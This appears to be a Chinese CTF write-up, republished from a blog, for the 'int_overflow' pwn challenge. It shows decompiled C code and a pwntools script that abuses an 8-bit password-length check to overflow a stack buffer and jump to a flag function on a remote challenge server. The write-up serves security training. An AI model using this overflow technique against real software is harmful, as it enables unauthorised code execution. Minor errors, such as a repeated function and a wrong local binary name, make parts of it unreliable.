当前位置:网站首页>PWN攻防世界int_overflow

PWN攻防世界int_overflow

2022-07-01 07:27:00 Day-3

在这里插入图片描述

首先,我们运行并查看一下文件。
在这里插入图片描述

在这里插入图片描述

丢入IDA中,查看源代码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  int v4; // [esp+Ch] [ebp-Ch] BYREF

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("---------------------");
  puts("~~ Welcome to CTF! ~~");
  puts(" 1.Login ");
  puts(" 2.Exit ");
  puts("---------------------");
  printf("Your choice:");
  __isoc99_scanf("%d", &v4);
  if ( v4 == 1 )
  {
    
    login();
  }
  else
  {
    
    if ( v4 == 2 )
    {
    
      puts("Bye~");
      exit(0);
    }
    puts("Invalid Choice!");
  }
  return 0;
}

char *__cdecl check_passwd(char *s)
{
    
  char dest[11]; // [esp+4h] [ebp-14h] BYREF
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    
    puts("Invalid Password");
    return (char *)fflush(stdout);
  }
  else
  {
    
    puts("Success");
    fflush(stdout);
    return strcpy(dest, s);
  }
}

int login()
{
    
  char buf[512]; // [esp+0h] [ebp-228h] BYREF
  char s[40]; // [esp+200h] [ebp-28h] BYREF

  memset(s, 0, 0x20u);
  memset(buf, 0, sizeof(buf));
  puts("Please input your username:");
  read(0, s, 0x19u);
  printf("Hello %s\n", s);
  puts("Please input your passwd:");
  read(0, buf, 0x199u);
  return check_passwd(buf);
}

char *__cdecl check_passwd(char *s)
{
    
  char dest[11]; // [esp+4h] [ebp-14h] BYREF
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u )
  {
    
    puts("Invalid Password");
    return (char *)fflush(stdout);
  }
  else
  {
    
    puts("Success");
    fflush(stdout);
    return strcpy(dest, s);
  }
}

查看之后,这个buf可以进行溢出操作。但需要注意,他转换为二进制的后两位需要大于3小于等于8。

from pwn import *

context(os='Linux',arch="x86",log_level="debug")
content = 0 

elf = ELF("int_overflow")
system_addr = elf.symbols["what_is_this"]

def main():
	global day3
	if content == 1:
		day3 = process("guess_num")
	else:
		day3 =remote("111.200.241.244",49182)
		
	payload = b'a' * (0x14 + 0x04) + p32(system_addr)
	payload = payload.ljust(260,b"a")
	
	day3.sendlineafter("Your choice:","1")
	day3.sendlineafter("Please input your username:\n","123")
	day3.recvuntil("Please input your passwd:\n")
	day3.sendline(payload)
	day3.interactive()
	
main()

在这里插入图片描述
得到Flag。

原网站

版权声明
本文为[Day-3]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_61823031/article/details/125546879

边栏推荐

猜你喜欢

随机推荐